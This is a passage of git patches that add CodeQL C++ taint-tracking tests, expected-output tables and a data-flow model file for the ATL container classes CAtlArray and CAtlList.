} +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 7809703f9c8..cd0b25deb45 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -147,6 +147,151 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:82:17:82:43 | call to indirect_source | atl.cpp:83:21:83:21 | y | | | atl.cpp:83:21:83:21 | y | atl.cpp:83:21:83:22 | call to _U_STRINGorID | TAINT | | atl.cpp:83:21:83:22 | call to _U_STRINGorID | atl.cpp:84:10:84:10 | u | | +| atl.cpp:103:15:103:35 | call to indirect_source | atl.cpp:104:19:104:19 | x | | +| atl.cpp:104:19:104:19 | x | atl.cpp:104:19:104:20 | call to CA2AEX | TAINT | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:105:29:105:29 | a | | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:106:10:106:10 | a | | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:107:10:107:10 | a | | +| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:108:3:108:3 | a | | +| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:106:10:106:10 | a | | +| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:107:10:107:10 | a | | +| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:108:3:108:3 | a | | +| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:107:10:107:10 | a | | +| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:108:3:108:3 | a | | +| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:108:3:108:3 | a | | +| atl.cpp:111:15:111:35 | call to indirect_source | atl.cpp:112:19:112:19 | x | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:113:29:113:29 | a | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:114:10:114:10 | a | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:115:10:115:10 | a | | +| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:116:3:116:3 | a | | +| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:114:10:114:10 | a | | +| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:115:10:115:10 | a | | +| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:116:3:116:3 | a | | +| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:115:10:115:10 | a | | +| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:116:3:116:3 | a | | +| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:116:3:116:3 | a | | +| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:131:20:131:20 | x | | +| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:137:20:137:20 | x | | +| atl.cpp:131:20:131:20 | x | atl.cpp:131:20:131:21 | call to CA2CAEX | TAINT | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:132:30:132:30 | a | | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:133:10:133:10 | a | | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:134:10:134:10 | a | | +| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:135:3:135:3 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:138:30:138:30 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:139:10:139:10 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:140:10:140:10 | a | | +| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:141:3:141:3 | a | | +| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:157:19:157:19 | x | | +| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:163:19:163:19 | x | | +| atl.cpp:157:19:157:19 | x | atl.cpp:157:19:157:20 | call to CA2WEX | TAINT | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:158:30:158:30 | a | | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:159:10:159:10 | a | | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:160:10:160:10 | a | | +| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:161:3:161:3 | a | | +| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:159:10:159:10 | a | | +| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:160:10:160:10 | a | | +| atl.cpp:158:30:158:30 | ref arg a | atl.cpp:161:3:161:3 | a | | +| atl.cpp:159:10:159:10 | a [post update] | atl.cpp:160:10:160:10 | a | | +| atl.cpp:159:10:159:10 | a [post update] | atl.cpp:161:3:161:3 | a | | +| atl.cpp:159:12:159:16 | ref arg m_psz | atl.cpp:160:12:160:16 | m_psz | | +| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:161:3:161:3 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:164:30:164:30 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:165:10:165:10 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:166:10:166:10 | a | | +| atl.cpp:163:19:163:23 | call to CA2WEX | atl.cpp:167:3:167:3 | a | | +| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:165:10:165:10 | a | | +| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:166:10:166:10 | a | | +| atl.cpp:164:30:164:30 | ref arg a | atl.cpp:167:3:167:3 | a | | +| atl.cpp:165:10:165:10 | a [post update] | atl.cpp:166:10:166:10 | a | | +| atl.cpp:165:10:165:10 | a [post update] | atl.cpp:167:3:167:3 | a | | +| atl.cpp:165:12:165:16 | ref arg m_psz | atl.cpp:166:12:166:16 | m_psz | | +| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:167:3:167:3 | a | | +| atl.cpp:215:11:215:21 | call to source | atl.cpp:219:11:219:11 | x | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:219:5:219:5 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:220:10:220:10 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:221:5:221:5 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:222:10:222:10 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:226:15:226:15 | a | | +| atl.cpp:218:20:218:20 | call to CAtlArray | atl.cpp:241:3:241:3 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:220:10:220:10 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:221:5:221:5 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:222:10:222:10 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:219:5:219:5 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:221:5:221:5 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:222:10:222:10 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:220:10:220:10 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:222:10:222:10 | a | | +| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:221:5:221:5 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:226:15:226:15 | a | | +| atl.cpp:222:10:222:10 | ref arg a | atl.cpp:241:3:241:3 | a | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:225:10:225:11 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:226:5:226:6 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:227:10:227:11 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:224:20:224:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:226:5:226:6 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:227:10:227:11 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:225:10:225:11 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:227:10:227:11 | a2 | | +| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:226:5:226:6 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:231:13:231:14 | a2 | | +| atl.cpp:227:10:227:11 | ref arg a2 | atl.cpp:241:3:241:3 | a2 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:230:10:230:11 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:231:5:231:6 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:232:10:232:11 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:229:20:229:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:231:5:231:6 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:232:10:232:11 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:230:10:230:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:232:10:232:11 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:231:5:231:6 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:234:10:234:11 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:232:10:232:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:235:11:235:12 | a3 | | +| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:234:10:234:11 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:235:11:235:12 | ref arg a3 | atl.cpp:239:26:239:27 | a3 | | +| atl.cpp:235:11:235:12 | ref arg a3 | atl.cpp:241:3:241:3 | a3 | | +| atl.cpp:235:14:235:20 | call to GetData | atl.cpp:235:10:235:22 | * ... | TAINT | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:238:10:238:11 | a4 | | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:239:5:239:6 | a4 | | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:240:10:240:11 | a4 | | +| atl.cpp:237:20:237:21 | call to CAtlArray | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:239:5:239:6 | a4 | | +| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:240:10:240:11 | a4 | | +| atl.cpp:238:10:238:11 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:239:5:239:6 | ref arg a4 | atl.cpp:240:10:240:11 | a4 | | +| atl.cpp:239:5:239:6 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:239:26:239:27 | a3 | atl.cpp:239:25:239:27 | & ... | | +| atl.cpp:240:10:240:11 | ref arg a4 | atl.cpp:241:3:241:3 | a4 | | +| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:244:5:244:6 | a5 | | +| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:245:10:245:11 | a5 | | +| atl.cpp:243:20:243:21 | call to CAtlArray | atl.cpp:250:3:250:3 | a5 | | +| atl.cpp:244:5:244:6 | ref arg a5 | atl.cpp:245:10:245:11 | a5 | | +| atl.cpp:244:5:244:6 | ref arg a5 | atl.cpp:250:3:250:3 | a5 | | +| atl.cpp:245:10:245:11 | ref arg a5 | atl.cpp:250:3:250:3 | a5 | | +| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:248:5:248:6 | a6 | | +| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:249:10:249:11 | a6 | | +| atl.cpp:247:20:247:21 | call to CAtlArray | atl.cpp:250:3:250:3 | a6 | | +| atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:249:10:249:11 | a6 | | +| atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | +| atl.cpp:249:10:249:11 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 0f8df1cd9f3843704d43be4efadd71440c98c4f4 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:34:42 +0000 Subject: [PATCH 0725/1267] C++: Add MaD model for 'CAtlArray'. --- cpp/ql/lib/ext/CAtlArray.model.yml | 15 +++++++++++++++ .../library-tests/dataflow/taint-tests/atl.cpp | 18 +++++++++--------- 2 files changed, 24 insertions(+), 9 deletions(-) create mode 100644 cpp/ql/lib/ext/CAtlArray.model.yml diff --git a/cpp/ql/lib/ext/CAtlArray.model.yml b/cpp/ql/lib/ext/CAtlArray.model.yml new file mode 100644 index 00000000000..29afc0c9959 --- /dev/null +++ b/cpp/ql/lib/ext/CAtlArray.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlArray", True, "Add", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "Append", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "Copy", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CAtlArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CAtlArray", True, "InsertArrayAt", "", "", "Argument[*1].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "InsertAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "SetAt", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "SetAtGrow", "", "", "Argument[@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*]", "value", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index c26966c908e..4b3f1438d8d 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -217,35 +217,35 @@ void test_CAtlArray() { { CAtlArray a; a.Add(x); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir a.Add(0); - sink(a[0]); // $ MISSING: ir + sink(a[0]); // $ ir CAtlArray a2; sink(a2[0]); a2.Append(a); - sink(a2[0]); // $ MISSING: ir + sink(a2[0]); // $ ir CAtlArray a3; sink(a3[0]); a3.Copy(a2); - sink(a3[0]); // $ MISSING: ir + sink(a3[0]); // $ ir - sink(a3.GetAt(0)); // $ MISSING: ir - sink(*a3.GetData()); // $ MISSING: ir + sink(a3.GetAt(0)); // $ ir + sink(*a3.GetData()); // $ ir CAtlArray a4; sink(a4.GetAt(0)); a4.InsertArrayAt(0, &a3); - sink(a4.GetAt(0)); // $ MISSING: ir + sink(a4.GetAt(0)); // $ ir } { CAtlArray a5; a5.InsertAt(0, source(), 1); - sink(a5[0]); // $ MISSING: ir + sink(a5[0]); // $ ir CAtlArray a6; a6.SetAtGrow(0, source()); - sink(a6[0]); // $ MISSING: ir + sink(a6[0]); // $ ir } } From c604a93d1611b2ef7be1e5196262ea2ac27559eb Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:37:08 +0000 Subject: [PATCH 0726/1267] C++: Add failing tests with 'CAtlList'. --- .../dataflow/taint-tests/atl.cpp | 147 ++++++++++++ .../dataflow/taint-tests/localTaint.expected | 214 ++++++++++++++++++ 2 files changed, 361 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 4b3f1438d8d..b1231c13c48 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -249,3 +249,150 @@ void test_CAtlArray() { sink(a6[0]); // $ ir } } + +template> +struct CAtlList { + using INARGTYPE = typename ETraits::INARGTYPE; + CAtlList(UINT nBlockSize) throw(); + ~CAtlList() throw(); + POSITION AddHead(); + POSITION AddHead(INARGTYPE element); + void AddHeadList(const CAtlList* plNew); + POSITION AddTail(); + POSITION AddTail(INARGTYPE element); + void AddTailList(const CAtlList* plNew); + POSITION Find(INARGTYPE element, POSITION posStartAfter) const throw(); + POSITION FindIndex(size_t iElement) const throw(); + E& GetAt(POSITION pos) throw(); + const E& GetAt(POSITION pos) const throw(); + size_t GetCount() const throw(); + E& GetHead() throw(); + const E& GetHead() const throw(); + POSITION GetHeadPosition() const throw(); + E& GetNext(POSITION& pos) throw(); + const E& GetNext(POSITION& pos) const throw(); + E& GetPrev(POSITION& pos) throw(); + const E& GetPrev(POSITION& pos) const throw(); + E& GetTail() throw(); + const E& GetTail() const throw(); + POSITION GetTailPosition() const throw(); + POSITION InsertAfter(POSITION pos, INARGTYPE element); + POSITION InsertBefore(POSITION pos, INARGTYPE element); + bool IsEmpty() const throw(); + void MoveToHead(POSITION pos) throw(); + void MoveToTail(POSITION pos) throw(); + void RemoveAll() throw(); + void RemoveAt(POSITION pos) throw(); + E RemoveHead(); + void RemoveHeadNoReturn() throw(); + E RemoveTail(); + void RemoveTailNoReturn() throw(); + void SetAt(POSITION pos, INARGTYPE element); + void SwapElements(POSITION pos1, POSITION pos2) throw(); +}; + +void test_CAtlList() { + int x = source(); + { + CAtlList list(10); + sink(list.GetHead()); + list.AddHead(x); + sink(list.GetHead()); // $ MISSING: ir + + CAtlList list2(10); + list2.AddHeadList(&list); + sink(list2.GetHead()); // $ MISSING: ir + + CAtlList list3(10); + list3.AddTail(x); + sink(list3.GetHead()); // $ MISSING: ir + + CAtlList list4(10); + list4.AddTailList(&list3); + sink(list4.GetHead()); // $ MISSING: ir + + { + CAtlList list5(10); + auto pos = list5.Find(x, list5.GetHeadPosition()); + sink(list5.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list6(10); + list6.AddHead(x); + auto pos = list6.FindIndex(0); + sink(list6.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list7(10); + auto pos = list7.GetTailPosition(); + list7.InsertAfter(pos, x); + sink(list7.GetHead()); // $ MISSING: ir + } + + { + CAtlList list8(10); + auto pos = list8.GetTailPosition(); + list8.InsertBefore(pos, x); + sink(list8.GetHead()); // $ MISSING: ir + } + { + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), x); + sink(list9.GetHead()); // $ MISSING: ir + } + } + + int* p = indirect_source(); + { + CAtlList list(10); + sink(list.GetHead()); + list.AddHead(x); + sink(list.GetHead()); // $ MISSING: ir + + CAtlList list2(10); + list2.AddHeadList(&list); + sink(list2.GetHead()); // $ MISSING: ir + + CAtlList list3(10); + list3.AddTail(x); + sink(list3.GetHead()); // $ MISSING: ir + + CAtlList list4(10); + list4.AddTailList(&list3); + sink(list4.GetHead()); // $ MISSING: ir + + { + CAtlList list5(10); + auto pos = list5.Find(x, list5.GetHeadPosition()); + sink(list5.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list6(10); + list6.AddHead(x); + auto pos = list6.FindIndex(0); + sink(list6.GetAt(pos)); // $ MISSING: ir + } + + { + CAtlList list7(10); + auto pos = list7.GetTailPosition(); + list7.InsertAfter(pos, x); + sink(list7.GetHead()); // $ MISSING: ir + } + + { + CAtlList list8(10); + auto pos = list8.GetTailPosition(); + list8.InsertBefore(pos, x); + sink(list8.GetHead()); // $ MISSING: ir + } + { + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), x); + sink(list9.GetHead()); // $ MISSING: ir + } + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index cd0b25deb45..5c7da7123ad 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -292,6 +292,220 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:249:10:249:11 | a6 | | | atl.cpp:248:5:248:6 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | | atl.cpp:249:10:249:11 | ref arg a6 | atl.cpp:250:3:250:3 | a6 | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:299:18:299:18 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:307:19:307:19 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:316:29:316:29 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:322:21:322:21 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:330:30:330:30 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:337:31:337:31 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:342:44:342:44 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:351:18:351:18 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:359:19:359:19 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:368:29:368:29 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:374:21:374:21 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:382:30:382:30 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:389:31:389:31 | x | | +| atl.cpp:295:11:295:21 | call to source | atl.cpp:394:44:394:44 | x | | +| atl.cpp:297:24:297:25 | 10 | atl.cpp:297:24:297:26 | call to CAtlList | TAINT | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:298:10:298:13 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:299:5:299:8 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:300:10:300:13 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:303:24:303:27 | list | | +| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:345:3:345:3 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:299:5:299:8 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:300:10:300:13 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:303:24:303:27 | list | | +| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:345:3:345:3 | list | | +| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:300:10:300:13 | list | | +| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:303:24:303:27 | list | | +| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:345:3:345:3 | list | | +| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:303:24:303:27 | list | | +| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:345:3:345:3 | list | | +| atl.cpp:302:25:302:26 | 10 | atl.cpp:302:25:302:27 | call to CAtlList | TAINT | +| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:303:5:303:9 | list2 | | +| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:304:10:304:14 | list2 | | +| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:345:3:345:3 | list2 | | +| atl.cpp:303:5:303:9 | ref arg list2 | atl.cpp:304:10:304:14 | list2 | | +| atl.cpp:303:5:303:9 | ref arg list2 | atl.cpp:345:3:345:3 | list2 | | +| atl.cpp:303:24:303:27 | list | atl.cpp:303:23:303:27 | & ... | | +| atl.cpp:304:10:304:14 | ref arg list2 | atl.cpp:345:3:345:3 | list2 | | +| atl.cpp:306:25:306:26 | 10 | atl.cpp:306:25:306:27 | call to CAtlList | TAINT | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:307:5:307:9 | list3 | | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:308:10:308:14 | list3 | | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:311:24:311:28 | list3 | | +| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:345:3:345:3 | list3 | | +| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:308:10:308:14 | list3 | | +| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:311:24:311:28 | list3 | | +| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:345:3:345:3 | list3 | | +| atl.cpp:308:10:308:14 | ref arg list3 | atl.cpp:311:24:311:28 | list3 | | +| atl.cpp:308:10:308:14 | ref arg list3 | atl.cpp:345:3:345:3 | list3 | | +| atl.cpp:310:25:310:26 | 10 | atl.cpp:310:25:310:27 | call to CAtlList | TAINT | +| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:311:5:311:9 | list4 | | +| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:312:10:312:14 | list4 | | +| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:345:3:345:3 | list4 | | +| atl.cpp:311:5:311:9 | ref arg list4 | atl.cpp:312:10:312:14 | list4 | | +| atl.cpp:311:5:311:9 | ref arg list4 | atl.cpp:345:3:345:3 | list4 | | +| atl.cpp:311:24:311:28 | list3 | atl.cpp:311:23:311:28 | & ... | | +| atl.cpp:312:10:312:14 | ref arg list4 | atl.cpp:345:3:345:3 | list4 | | +| atl.cpp:315:27:315:28 | 10 | atl.cpp:315:27:315:29 | call to CAtlList | TAINT | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:316:18:316:22 | list5 | | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:316:32:316:36 | list5 | | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:317:12:317:16 | list5 | | +| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:316:18:316:22 | ref arg list5 | atl.cpp:317:12:317:16 | list5 | | +| atl.cpp:316:18:316:22 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:316:24:316:27 | call to Find | atl.cpp:317:24:317:26 | pos | | +| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:316:18:316:22 | list5 | | +| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:317:12:317:16 | list5 | | +| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:317:12:317:16 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | +| atl.cpp:321:27:321:28 | 10 | atl.cpp:321:27:321:29 | call to CAtlList | TAINT | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:322:7:322:11 | list6 | | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:323:18:323:22 | list6 | | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:324:12:324:16 | list6 | | +| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:323:18:323:22 | list6 | | +| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:324:12:324:16 | list6 | | +| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:323:18:323:22 | ref arg list6 | atl.cpp:324:12:324:16 | list6 | | +| atl.cpp:323:18:323:22 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | +| 